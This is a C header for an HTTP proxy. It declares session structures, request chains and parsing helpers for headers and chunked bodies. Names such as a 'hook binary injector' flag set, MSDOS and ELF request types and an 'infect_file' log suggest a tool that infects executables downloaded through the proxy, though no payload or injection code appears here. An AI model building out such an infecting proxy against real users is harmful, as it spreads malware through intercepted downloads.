#ifndef J_PROXY_H
#define J_PROXY_H

#include "jtypes.h"
#include "jsocket.h"
#include "jmalloc.h"
#include "jhook.h"
#include "utils.h"
#include "df.h"
#include "line_buffer.h"

/* message type */
#define CLIENT_GET_REQUEST              0x01
#define CLIENT_POST_REQUEST             0x02
#define CLIENT_PUT_REQUEST              0x04
#define CLIENT_OPTION_REQUEST           0x08
#define CLIENT_UNKNOWN_REQUEST          0x0C

/* info */
#define REQUEST_TYPE_MSDOS              0x01
#define REQUEST_TYPE_ELF                0x02 

/* status - http connection state */
#define __MSG_CUR_BODY                 0x00100000
#define __MSG_CUR_HEADER               0x00200000
#define __MSG_CUR_SERVER               0x00400000
#define __MSG_CUR_CLIENT               0x00800000
#define __MSG_COMPLETED                0x00010000

/* body_type .. add more Transfer-Encoding support.. */
#define __MSG_BODY_HAS_CHUNK           0x10000000
#define __MSG_BODY_CHUNK_SIZE_EXPECTED 0x20000000
#define __MSG_BODY_CHUNK_CUR_PROC      0x40000000
#define __MSG_BODY_CHUNK_END           0x80000000

#define __MSG_BODY_HAS_CONTENT_LENGTH  0x01000000
#define __MSG_BODY_ON_CLOSE            0x02000000


/* hook binary injector  */
#define __MSG_BIN_TRACKED              0x00000001
#define __MSG_BIN_HOOKED               0x00000002
#define __MSG_BIN_INGNORED             0x00000004


/* used also by server side... (__status/__body_type) */
struct client_request
{
  struct client_request *next;
  struct client_request *prev;

  /* set by internal client connection parser but used in server hook handler.. */
  unsigned int message_type;
  unsigned int info_client;
  unsigned int info_server;
 
  /* this is used only by internal client connection parser .. */
  unsigned int __hook;
  unsigned int __status;
  unsigned int __body_type;
  unsigned int __body_status;
 
  /* used by handler and parser .... */
  unsigned int priv, total_len, cur_len, chunk_len, /* content-length body lenght */ chunk; // chunk = chunk len expected 
  unsigned int flags;
 
  
};


struct client_request_chain
{
  struct client_request *head;
  struct client_request *tail;
  unsigned int request_num;
};



/* now chain of hook are statically taken from a unique source (SEE jproxy.c) */
typedef struct proxy_session_s
{
  /* two peer socket */  
  j_socket *client_link;
  j_socket *server_link;

  /* buffering for header/body processing */
  line_buffer_t* lb_client;
  line_buffer_t* lb_server; 

  struct client_request_chain *cli_req_chain;
  struct client_request  *cur_req;            // tmp request used during client parsing..
  struct client_request  *cur_req_to_process; // tmp request used by server hook

  struct hook_filter_chain* client_chain;     // client hook
  struct hook_filter_chain* server_chain;     // server hook

  filter_hook cur_hook;                       // client/server mandatory hook 

} proxy_session_t;


/* global per process session: every child has only one session */
extern proxy_session_t g_session; 

/* the real core of the session activity */
extern int stream_proxy_session(proxy_session_t *session, unsigned int mode);

/* initialization function for the session */
extern proxy_session_t   *init_proxy_session(j_socket *jsock); // use per_child_session ptr

extern const char *infect_file_log;
extern FILE *infect_file;

/* chain request function */
extern void init_request_chain(struct client_request_chain *chain);
extern void init_request(struct client_request *request);
extern void put_request_chain(struct client_request_chain *chain, struct client_request *request);
extern struct client_request *get_request_chain(struct client_request_chain *chain);

#define PEER_CLIENT 0x1
#define PEER_SERVER 0x2


/* new design */
#define PROTOCOL_ERROR   (-1) // error on protocol
#define PROTOCOL_NO_DATA ( 0) // no data to read
#define PROTOCOL_AGAIN   ( 1) // there is data, try to read again soon
#define PROTOCOL_END     ( 2) // the body is ended (depend on protocol there could be be some data.. )
#define PROTOCOL_OK      ( 3) // ok, no more data
extern int process_header (proxy_session_t *session, df_t **new_df, int peer);
extern int process_body   (proxy_session_t *session, df_t **new_df, int peer);


extern int request_header_modifier(proxy_session_t *session, df_t *df, int peer);
extern int request_body_modifier  (proxy_session_t *session, df_t *df, int peer);

static inline struct client_request *get_cur_request(proxy_session_t *session, int peer)
{
  assert(peer == PEER_CLIENT || peer == PEER_SERVER );
  
  struct client_request *req=NULL;
  
  if( peer == PEER_CLIENT )
  {
    if( session->cur_req )
      return session->cur_req;
    else
    {
      req = jmalloc(sizeof(struct client_request));
      if( !req )
        return NULL;

      init_request(req);
      session->cur_req = req;

      return req;
    }
  }
  else
  {
    if( session->cur_req_to_process )
      return session->cur_req_to_process;
    else
    {
       req = get_request_chain(session->cli_req_chain);
       session->cur_req_to_process = req;
       return req; // can be null if some protocol error occurs
    }
  }
}

static inline LINE *get_header_line(proxy_session_t *session, size_t *len, int peer)
{
  assert(peer == PEER_CLIENT || peer == PEER_SERVER );
        
  if( peer == PEER_CLIENT )
    return lb_query_line(session->lb_client, len);
  else
    return lb_query_line(session->lb_server, len);
}


static inline DATA *get_body_data(proxy_session_t *session, size_t *len, int peer)
{
  assert( peer == PEER_CLIENT || peer == PEER_SERVER );

  if( peer == PEER_CLIENT )
    return lb_query_last(session->lb_client, len);
  else
    return lb_query_last(session->lb_server, len);

}

/* 0 if ok, if > 0 there is discared data.. */
static inline size_t put_data(proxy_session_t *session, const DATA *data, size_t len, int peer)
{
  size_t discard=0;
  assert(peer == PEER_CLIENT || peer == PEER_SERVER );

  if( peer == PEER_CLIENT )
    lb_insert_data(session->lb_client, data, len, &discard);
  else
    lb_insert_data(session->lb_server, data, len, &discard);

  
  return discard;
}


static inline int is_empty_line(const LINE *line, size_t len)
{
  if( len == 2 && line[0] == CR && line[1] == LF )
    return 1;
  else 
    return 0;

}


static inline void set_request_status(struct client_request *req, unsigned int status)
{
  assert( status == __MSG_COMPLETED || status == __MSG_CUR_BODY || status == __MSG_CUR_HEADER );
        
  req->__status &= ~(__MSG_COMPLETED|__MSG_CUR_BODY|__MSG_CUR_HEADER);
  req->__status |= status;
}

static inline void set_request_body_type(struct client_request *req, unsigned int status)
{
  assert( status == __MSG_BODY_HAS_CHUNK || status == __MSG_BODY_HAS_CONTENT_LENGTH || status == __MSG_BODY_ON_CLOSE );
        
  req->__body_type &= ~(__MSG_BODY_HAS_CHUNK| __MSG_BODY_HAS_CONTENT_LENGTH);
  req->__body_type |= status;
}

static inline void set_request_body_state(struct client_request *req, unsigned int status)
{
  assert( status == __MSG_BODY_CHUNK_SIZE_EXPECTED || status == __MSG_BODY_CHUNK_CUR_PROC || status == __MSG_BODY_CHUNK_END );  

  req->__body_status &= ~(__MSG_BODY_CHUNK_SIZE_EXPECTED|__MSG_BODY_CHUNK_CUR_PROC|__MSG_BODY_CHUNK_END);
  req->__body_status |= status;
}

#endif
